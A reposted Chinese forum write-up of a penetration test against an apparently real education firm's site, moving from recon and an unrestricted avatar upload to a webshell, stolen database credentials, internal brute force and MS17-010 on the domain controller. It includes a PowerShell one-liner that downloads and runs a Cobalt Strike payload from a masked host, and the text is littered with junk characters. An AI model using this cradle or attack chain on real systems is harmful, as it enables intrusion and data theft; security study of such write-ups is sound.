找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2093|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! S" j J- L9 ^, U 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 ( T, P" z9 @/ o$ j# m2 o

9 [: w s% z+ j! y& ^8 k- K

* [* o* K* {) C5 U, y   # ~/ C" g' H2 D3 Y2 |

. \3 v" W# r u# M% f

. j* Z& A$ j+ \$ E0 e 正文; F0 `+ p- R) L+ t$ R

' i5 i" J8 j/ T

- ^) q9 _7 l- Q4 k) f. s0 b5 n   * j2 U4 l; i0 f4 K' t6 }% n1 m

+ X% k9 o+ t8 j! i. s6 X

5 o; y1 V* t# O. b6 o: d 目标:www.xxxx.com(一家教育机构)
7 o! `$ Z2 O7 ^) q) h+ W7 u
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# E& b3 Z6 B P: `8 V3 a

+ \# K! ] [- _; ^- `

( o0 e; i0 C# g8 n vshapes=6 c( ~8 E! \$ f' B% |

5 L/ H8 p, B+ R3 O/ M/ H

: @. x* C. H8 _" V: X 进行了简单的信息搜集
8 e) o% w: T5 g$ _2 T) g2 }
7 i, N* M' @2 [, P, d b
6 |4 _& |& a# m7 V: ? Z& P" Z

7 T# v" I) H& o0 t" c

9 L) B# L( m8 c6 \# I 子域名搜集& B# O" L! S% J) \: w2 R

: B# c9 J) k3 h, i! L

9 }; c. f/ t1 k5 h7 q. A" K vshapes= # L4 Q5 ^2 g# X& ~- B* x

2 [* {+ l% ], Q0 r' X

T& F# K& ?$ u0 w2 h$ L# Q fofa找资产
! Y( ^$ D, U# O! m+ l* c
/ ^ o! b# z1 m: g' M" [
1 D5 t- t- T" K" `

% `$ g; m* q1 A, p0 ?

* ~9 e. F- ]0 y, i- ~6 \1 m; ^ vshapes=0 n- [$ d8 x+ _8 f) {

/ c( t" g; S- X- o+ W, ~# P/ R

2 Z: c; ?3 d2 E9 x# i 一共七个资产。去重之后只有两个。
, R6 C+ |9 V# ` I7 l; q
6 q, D, e3 ?" N
# h+ l9 z7 @' s" {7 x

9 |& n5 v# G( L" s% j/ P+ B8 u

, K0 h2 y0 ~1 x8 Q) @3 s 目录探测8 \/ M6 B' [: k2 `+ W3 T

% H+ N0 o/ U, { b' ?

P. c+ u* f( R6 R* ] vshapes=* Q; D0 b6 D6 x6 B

2 I' S6 j; e& \/ x

- T$ t5 g* T1 P( w0 O 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
1 B6 t$ t7 h: F9 k- z. J) f( [! [
8 a0 W! ~$ ~1 f8 x$ P. t
" v* w+ w* m- R. n( n; F6 j

+ l# {5 U* s9 U! i9 G

# T* U5 D5 i, N& u: Q, c( R- L% J 我又尝试了通过修改返回包来绕过登录界面, {3 l% ^% i( [: Q, p- ^

' ~) L9 Y( ?$ V* ^/ N$ l* d

& i' F" C7 l9 o/ W9 z! o vshapes= 0 P u5 ]0 Z. o" ~

7 \. z$ u9 b' B* _+ r* @) b

: g8 U7 h6 k: o" ^/ E9 ^ 还是不行,尝试注入无果 e; Y8 ]! l5 F- O

9 Y2 U& a/ j% `, G8 W/ H

4 `' k- p" E! f* T vshapes=& U, B$ M7 L& |" Y4 {- B

1 {, p, y0 ?8 }) z9 w4 m

6 {2 G4 G9 G" ]+ p% e+ h( I6 e) U 不过我目录探测出了一处Spring信息泄露
; H& _2 l. Y9 H. z- C% f
+ X' a8 k) `+ w' E! K& P! a# g
6 s3 P3 r' F/ \

* V2 C: A# v; ?1 H6 ^7 m

5 x) I( T+ h) p* b% _( H vshapes=3 ^5 ^9 j0 x0 F5 w" ?( l& x

& e- b6 S+ {7 o- g) u. p

( i/ e% b" j. H+ }* l4 I3 A 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 + w9 Q2 ~9 h5 i& {* z

$ o- |3 o# R7 k: v! s4 O

1 {0 S1 N' P) G vshapes= ! J* }+ X' Y7 m9 t* K

9 x- |" R6 v; n. r

2 r0 n6 e) m2 D4 I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 ) f; A5 I: A) I3 B) |4 p* c

# D! H% Q2 i0 @4 R; F( w

4 V' I @2 N5 F P" t: \ vshapes=3 n+ o" o; }) S- u5 g

# O. R' ~" S' Y) w; l

. K, J0 s, V- T6 j+ G 获取有些师傅到这一步就手机抓包电脑测了。& R9 x. R! c- f% r+ E0 H) Q

; H- }2 w( e: D" Y) Q

: P! d3 p! y3 b, Y# Y5 S9 {/ @& | Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 & x8 S; v& Y* O- L# I

4 b, C( Z/ F9 o7 T( y" v

" C& o$ f9 K0 D( N F% {" ] 其中在一个公众号发现了小程序,可以进行注册。7 S' r' D1 {' u: c8 `4 Q0 R

' ?% E2 H( F" B. \

9 F' O# m1 M i! T 看到了头像上传,尝试上传获取WebShell : Z0 ?. b" V& r

% t+ d3 H* F. R- }+ `1 h$ j# _/ }

/ x- n, i$ e- ]+ f( g vshapes=) g; V, H* N6 ]" z/ D8 l8 G& R3 Z3 H

0 f/ o o3 F9 ~; \0 Q4 T

3 S; @7 o6 c- x' {$ `5 Z( e 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 R4 _$ T6 d9 P* i

% b# ]/ I8 [6 u! R+ y9 B' S# d

# [0 A# c6 E4 E3 u- f vshapes= 5 ~3 i( G6 W! n1 I ?% N6 p

# z; `, x9 e( G1 o6 ]) ^

8 g" o( Y) J2 @( }. O7 o6 o5 p 然后上了大马- r- Z; |+ R5 O) m, Q9 |5 C

3 U1 u5 U+ O( m5 _" c' X3 b( K- }' \

/ T4 d1 b+ o5 f vshapes= & [# ~1 d+ Q0 O) ~

- ~' W$ S% j! E' t

. I% y; U( N; G7 n& _3 B' s: U2 s vshapes= 5 _- _$ Q& L" M1 J1 A: t

, Y7 a% p% v- o3 H j8 ?4 t# m

4 q7 p* N$ b& D 通过翻找文件发现数据库账号密码4 `& v5 o2 b: @; b! l' M4 x" C

& a$ {* b1 l5 i* v) L; T- _+ {

( V' _% t! l' y vshapes= # y% F* b9 C( ]

& U$ S# R) r7 E3 G! Y; K

# [+ [0 ]6 x/ a, r) M" v3 c --内网渗透, U+ I2 v8 p9 l

+ ~; [6 ~* q. [5 _2 E9 D+ u

: N5 {% D# Y2 X5 U 直接通过powershell执行 cs上线- ~$ z+ ~; a* L* e# F

+ {% X: X6 X9 n( q

! g! F3 k5 `9 s; `0 ^( V- d powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ' x# y# q7 ]9 G

' H3 {! i( v7 `+ d. H, O

, h% v3 M E* E/ h+ Q7 J" q vshapes=7 l$ ]9 S8 R- r# A

, _2 y! D: D) `/ H# d% H

& [8 T) y. Z* [ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 0 p. `# M" v8 L% [4 b

7 p; J5 ^# j; ~3 K3 s

: P) T) c: l9 M4 h vshapes= * F' ^# Q. x/ z: L! L: v) `+ ^& M" Z8 n

4 |( }8 N6 t" g/ q

; H( W4 M& A5 A 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
c- G# P' F! w( |/ y
5 l k I9 a: V9 H y) o( I6 I. C
* e% E0 O) _; K4 H3 _" @ e- c, d
. y. `6 K! E8 `0 F3 q Y0 v

) @! [! _9 A- l

, b9 a% Q* |% d5 s/ c$ E vshapes= & T2 V8 Z( V" P' a6 |1 n6 _ }

: J# y$ `) o5 z/ d9 M, f% O; a; G

* B& b5 W! o4 b% M 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
E, R. h3 Y7 P. \1 |
0 |, Y& a a$ P* D; p; S
5 @: d) {) A8 r8 S8 v0 u$ O

3 e7 }" Z/ w" l0 w* e; P

1 o2 c4 C7 A5 l: q+ J: \ vshapes=. h$ x/ g1 ~% U: J

5 S+ e: H3 s5 Y9 I; e/ w$ g3 r

3 ]7 {9 h+ K7 w! s6 {; k' \
$ i: [; M# k# Q \9 r
7 _. ~# I; g7 u+ p- L+ N2 C
4 C8 u" R8 P x- Y' X3 J

) B+ k7 x0 d: B$ I, x5 W

9 P, @+ ~0 Q, [1 d$ N2 _% ~/ C5 [4 H   @* ^, @) l0 s( o4 S% n* M

! J. n( ^- W+ M

- y! ^& o' f( \4 M$ A7 i7 M+ {% S/ ~ 小结/ z1 n4 d4 L u$ [6 Z! T

: K2 B. r! [4 n; O# Q

U" A+ a4 [5 r3 i6 F5 X( E  " W6 T4 {4 E6 h3 y u

, N# R3 o* v2 `4 i+ f

M2 x% ?) I; M" |- M 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!4 B" j/ m' O4 d+ h* l: A3 N

( X$ d+ j& S, B9 `" o

4 |# Q) H$ j$ n9 I( @7 J   ! z4 W E% `5 M! ~% Y

# R! @, t/ Y/ l" X# h
    ; C. x0 ^! l$ H+ \/ k# m0 a. c
  • * ^' Y- l" ]: C0 m' \6 K   0 v. e' q7 o/ m, m; o% s
  • , f( D* {& r4 M- }0 z, r# A
  • ! }/ j9 _# C5 O8 o+ @3 w   - E+ X( j S8 y
  • : `) a: n, ?) B4 X( s( U- A/ N; T# D
. A- O; r7 R$ {! P9 l

$ e; A* f) L5 U+ U* ]+ j. n( ~ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html; U) ~1 V; R0 {& t# t

2 }2 f: _' E- @5 s* `4 v! F

! z7 ]3 u7 W3 s9 K, ]   # \* h( Z# g y; ^+ J" K# P' {' u: w

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表